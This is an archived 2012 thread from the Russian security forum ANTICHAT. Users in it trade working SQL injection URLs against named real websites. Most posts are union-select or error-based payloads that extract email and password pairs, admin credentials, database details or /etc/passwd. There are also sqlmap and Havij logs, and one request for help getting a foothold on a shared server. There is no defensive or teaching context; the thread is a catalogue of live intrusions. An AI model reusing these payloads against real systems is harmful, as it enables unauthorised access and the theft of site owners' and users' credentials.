ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.03.2012, 18:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Код:
Code:
http://www.stroyka74.ru/tenders/-1459768'+union+select+1,2,3,4,5,6,7,8,9,concat(email,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+stroyka74_users+limit+1,1+--+
тИЦ 600
PR 4 |
|
|
|
28.03.2012, 18:33
|
|
Новичок
Регистрация: 22.11.2007
Сообщений: 8
Провел на форуме:
666931
Репутация:
20
|
|
Код:
Code:
http://www.star-book.ru/print.php?id=11+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
User: svertokr_boo@localhost
Database: svertokr_book
Version: 5.1.56-log |
|
|
28.03.2012, 20:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
45597
Репутация:
0
|
|
тИЦ - 130, PR - 3.
Сообщение от None
http://www.bdhorse.ru/index.php?id=3-999.9+union+select+1,Concat_ws(0x2A2F2F2F2A,Versio n(),User(),Database()),3,4--
Вывод в теге .
Version: 5.1.41-log
User: bdhorse_mysql@212.193.239.218
Database: bdhorse_db
тИЦ - 150, PR - 3.
Сообщение от None
http://www.kvartkirov.ru/builders/reviews.php?id=11-999.9+union+select+1,2,Concat_ws(0x2A2F2F2F2A,Vers ion(),User(),Database()),4,5,6,7,8--
5.1.52
User: us5254a_kv_main@localhost
Database: db5254a
|
|
|
|
28.03.2012, 23:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
На сервере около 30 сайтов средним ТИЦ = 10 каждый, есть и больше. Кто зальется, напишите в ПМ, как раскрыли пути(вечно у меня с ними проблема). Спасибо.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//world-stamps.info/countryw.php?id_country=-1'+union+select+load_file('/etc/passwd')--+[/COLOR][/COLOR]
|
|
|
|
29.03.2012, 14:26
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
Провел на форуме:
60216
Репутация:
0
|
|
Ну раз он говорит, что "is vulnerable", почему не раскручивает скулю?
Sqlmap:
GET parameter 'SECTION_ID' is vulnerable. Do you want to keep testing the others
? [y/N] y
sqlmap identified the following injection points with a total of 60 HTTP(s) requ
ests:
---
Place: GET
Parameter: SECTION_ID
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: SECTION_ID=2') AND SLEEP(5) AND ('hJWR'='hJWR
---
[13:01:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Nginx
back-end DBMS: MySQL 5.0.11
[13:01:32] [INFO] fetching current database
[13:01:32] [INFO] retrieved:
current database: None
[13:01:37] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap-0.
9\sqlmap\output\www.opin.ru'
Havij
Selected Column Count is 2
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Retying to find string column
Valid String Column is 1
DB Server: unknown
Finding current data base
Database type was not recognized, Injection Failed!
|
|
|
|
29.03.2012, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
515
Репутация:
0
|
|
скромненько
Сообщение от None
http://efbw.eu/news.php?ID=41+union+select+1,2,group_concat(0x0b, id,0x3a,login,0x3a,password),4,5+from+tb_login+--
|
|
|
|
30.03.2012, 20:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
cta-m.ru
Сообщение от None
http://cta-m.ru/detail.html?id=39355%27+or+1+group+by+concat%28%28 select+version%28%29%29,0x00,floor%28rand%280%29*2 %29%29having+min%280%29+or+1--+
Сообщение от None
http://www.m-words.ru/author.php?id=21&poem=963+or+1+group+by+concat%28% 28select+concat_ws%280x3a,table_schema,table_name, table_rows%29+from+information_schema.tables+where +table_schema!=0x696e666f726d6174696f6e5f736368656 d61+limit+0,1%29,0x00,floor%28rand%280%29*2%29%29h aving+min%280%29+or+1--+
Сообщение от None
http://www.inconnect-group.ru/pressrelease/?id=58+limit+0,0+union+select+1,2,3,4,version%28%2 9,6,7,8,9--+
Сообщение от None
http://vgasoft.spb.ru/main.cgi?act=dict_detail&id=6+or+1+group+by+concat %28%28select+concat_ws%280x3a,table_schema,table_n ame%29+from+information_schema.tables+limit+0,1%29 ,0x00,floor%28rand%280%29*2%29%29having+min%280%29 +or+1--+
|
|
|
|
31.03.2012, 13:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//shops.tombiz.ru/catalog.php?id=-1+union+select+1,2,3,4,user(),6,7,8,9,10,11--[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.24info.net/sim.php?id=-71+union+select+1,2,3,4,5,6,7,8,concat_ws(0x03a,user(),database(),version())--[/COLOR][/COLOR]
|
|
|
|
02.04.2012, 21:50
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224
Репутация:
388
|
|
Сообщение от None
http://www.onewrestlingshow.com/host.php?id=-3+union+select+1,group_concat(0x0b,userID,0x3a,nam e,0x3a,email,0x3a,password,0x3a,salt),3,4,5,6,7,8, 9,10,11,12,13+from+users+--
Сообщение от None
http://www.ukraine-hotel.com.ua/room.php?id=-3+union+select+group_concat(0x0b,admin_login,0x3a, admin_pass),2,3,4,5+from+ukraine_admin+--
ps модеры сорри что сначала не туда запостил
|
|
|
|
02.04.2012, 22:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
103014
Репутация:
76
|
|
Ня!
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//justmypassion.fr/index.php?id=-37+union+select+1,2,@@datadir,4,5--[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [CRC]](/avatars/avatar45324.jpg?3083734){kind=avatar}
Линейный вид
